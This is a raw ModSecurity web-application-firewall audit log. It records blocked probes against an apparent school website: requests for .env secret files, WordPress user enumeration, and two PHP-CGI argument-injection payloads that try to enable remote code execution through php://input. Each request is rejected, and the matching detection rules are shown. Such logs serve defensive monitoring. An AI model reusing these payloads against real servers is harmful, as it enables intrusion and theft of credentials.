Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3f6db54-Z-- --e9a7c049-A-- [24/May/2025:01:41:46 +0700] aDDBah67_KloOut96EnRyQAAAJU 103.236.140.4 45328 103.236.140.4 8181 --e9a7c049-B-- GET /config/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.233.74.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.233.74.105 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --e9a7c049-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9a7c049-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748025706529511 694 (- - -) Stopwatch2: 1748025706529511 694; combined=281, p1=244, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9a7c049-Z-- --e0bd9311-A-- [24/May/2025:01:41:46 +0700] aDDBah67_KloOut96EnRygAAAJE 103.236.140.4 45340 103.236.140.4 8181 --e0bd9311-B-- GET /.env.local HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.233.74.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.233.74.105 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --e0bd9311-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0bd9311-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748025706729279 655 (- - -) Stopwatch2: 1748025706729279 655; combined=241, p1=208, p2=0, p3=0, p4=0, p5=33, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0bd9311-Z-- --8946db4d-A-- [24/May/2025:01:41:46 +0700] aDDBah67_KloOut96EnRzQAAAI0 103.236.140.4 45346 103.236.140.4 8181 --8946db4d-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.233.74.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.233.74.105 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --8946db4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8946db4d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748025706738839 680 (- - -) Stopwatch2: 1748025706738839 680; combined=293, p1=251, p2=0, p3=0, p4=0, p5=42, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8946db4d-Z-- --21836b57-A-- [24/May/2025:01:57:01 +0700] aDDE_W_WNRyhaqaKDLwZDAAAAMI 103.236.140.4 49252 103.236.140.4 8181 --21836b57-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.221.220.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.221.220.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --21836b57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21836b57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748026621598552 3453 (- - -) Stopwatch2: 1748026621598552 3453; combined=1894, p1=530, p2=1333, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21836b57-Z-- --c2b80c6c-A-- [24/May/2025:02:40:45 +0700] aDDPPR67_KloOut96EkWcgAAAJU 103.236.140.4 57446 103.236.140.4 8181 --c2b80c6c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 165.98.134.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 165.98.134.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2b80c6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2b80c6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748029245557130 4088 (- - -) Stopwatch2: 1748029245557130 4088; combined=2096, p1=618, p2=1442, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2b80c6c-Z-- --b52c3341-A-- [24/May/2025:02:50:22 +0700] aDDRfrz70bfNdlplZZPRrQAAAEg 103.236.140.4 50302 103.236.140.4 8181 --b52c3341-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.227.93.71 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.227.93.71 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b52c3341-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b52c3341-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748029822333399 664 (- - -) Stopwatch2: 1748029822333399 664; combined=237, p1=207, p2=0, p3=0, p4=0, p5=30, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b52c3341-Z-- --721be901-A-- [24/May/2025:02:58:48 +0700] aDDTeB67_KloOut96Ekp7gAAAIo 103.236.140.4 40058 103.236.140.4 8181 --721be901-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 114.43.135.35 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 114.43.135.35 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --721be901-C-- --721be901-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --721be901-E-- --721be901-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748030328824491 5257 (- - -) Stopwatch2: 1748030328824491 5257; combined=3807, p1=532, p2=3238, p3=0, p4=0, p5=36, sr=62, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --721be901-Z-- --aee9d31b-A-- [24/May/2025:03:06:05 +0700] aDDVLR67_KloOut96EkxWQAAAII 103.236.140.4 55658 103.236.140.4 8181 --aee9d31b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 94.182.87.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 94.182.87.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --aee9d31b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aee9d31b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748030765831771 2816 (- - -) Stopwatch2: 1748030765831771 2816; combined=1173, p1=395, p2=736, p3=0, p4=0, p5=42, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aee9d31b-Z-- --b9b8a507-A-- [24/May/2025:03:20:58 +0700] aDDYqh67_KloOut96Ek_lwAAAIE 103.236.140.4 59086 103.236.140.4 8181 --b9b8a507-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 138.121.183.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 138.121.183.181 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b9b8a507-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9b8a507-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748031658354319 4276 (- - -) Stopwatch2: 1748031658354319 4276; combined=2294, p1=710, p2=1546, p3=0, p4=0, p5=37, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9b8a507-Z-- --832ffd38-A-- [24/May/2025:03:31:44 +0700] aDDbMG_WNRyhaqaKDLyBLgAAAMg 103.236.140.4 53912 103.236.140.4 8181 --832ffd38-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --832ffd38-C-- --832ffd38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --832ffd38-E-- --832ffd38-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748032304544764 3827 (- - -) Stopwatch2: 1748032304544764 3827; combined=2545, p1=514, p2=1999, p3=0, p4=0, p5=31, sr=56, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --832ffd38-Z-- --59a54622-A-- [24/May/2025:03:35:44 +0700] aDDcIFYzwfxII7zMfyFjbAAAAAQ 103.236.140.4 33986 103.236.140.4 8181 --59a54622-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.205.48.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.205.48.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --59a54622-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59a54622-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748032544419844 3289 (- - -) Stopwatch2: 1748032544419844 3289; combined=2104, p1=624, p2=1445, p3=0, p4=0, p5=35, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59a54622-Z-- --aa1c784b-A-- [24/May/2025:03:43:40 +0700] aDDd_G_WNRyhaqaKDLyNPgAAANY 103.236.140.4 50858 103.236.140.4 8181 --aa1c784b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.235.252.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.235.252.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --aa1c784b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa1c784b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748033020150661 3287 (- - -) Stopwatch2: 1748033020150661 3287; combined=1782, p1=557, p2=1196, p3=0, p4=0, p5=29, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa1c784b-Z-- --a6bccc6a-A-- [24/May/2025:03:45:25 +0700] aDDeZW_WNRyhaqaKDLyP9QAAAMQ 103.236.140.4 54652 103.236.140.4 8181 --a6bccc6a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.252.145.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.252.145.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a6bccc6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6bccc6a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748033125685785 3855 (- - -) Stopwatch2: 1748033125685785 3855; combined=2408, p1=682, p2=1687, p3=0, p4=0, p5=39, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6bccc6a-Z-- --ca67a55a-A-- [24/May/2025:04:19:14 +0700] aDDmUvmzt4abyoi_U9lu4wAAAIE 103.236.140.4 37638 103.236.140.4 8181 --ca67a55a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 205.201.200.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 205.201.200.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ca67a55a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca67a55a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748035154266092 2364 (- - -) Stopwatch2: 1748035154266092 2364; combined=1172, p1=406, p2=739, p3=0, p4=0, p5=27, sr=150, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca67a55a-Z-- --ea80c15c-A-- [24/May/2025:04:20:52 +0700] aDDmtOunkxaVeh4NwhZXOQAAAEY 103.236.140.4 39000 103.236.140.4 8181 --ea80c15c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 168.227.104.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 168.227.104.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ea80c15c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea80c15c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748035252898920 2655 (- - -) Stopwatch2: 1748035252898920 2655; combined=1161, p1=395, p2=738, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea80c15c-Z-- --a793a72e-A-- [24/May/2025:04:25:01 +0700] aDDnreO2UzDOKMmK0i4uIgAAAAQ 103.236.140.4 39674 103.236.140.4 8181 --a793a72e-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 52.169.186.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.169.186.169 X-Forwarded-Proto: http Connection: close --a793a72e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a793a72e-H-- Message: Access denied with code 403 (phase 2). String match ".php" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748035501240518 3271 (- - -) Stopwatch2: 1748035501240518 3271; combined=1304, p1=540, p2=733, p3=0, p4=0, p5=31, sr=152, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a793a72e-Z-- --bcf3cb1b-A-- [24/May/2025:04:39:20 +0700] aDDrCOunkxaVeh4NwhZYjwAAAEw 103.236.140.4 42864 103.236.140.4 8181 --bcf3cb1b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.16.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.16.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bcf3cb1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcf3cb1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748036360250813 3010 (- - -) Stopwatch2: 1748036360250813 3010; combined=1302, p1=436, p2=836, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
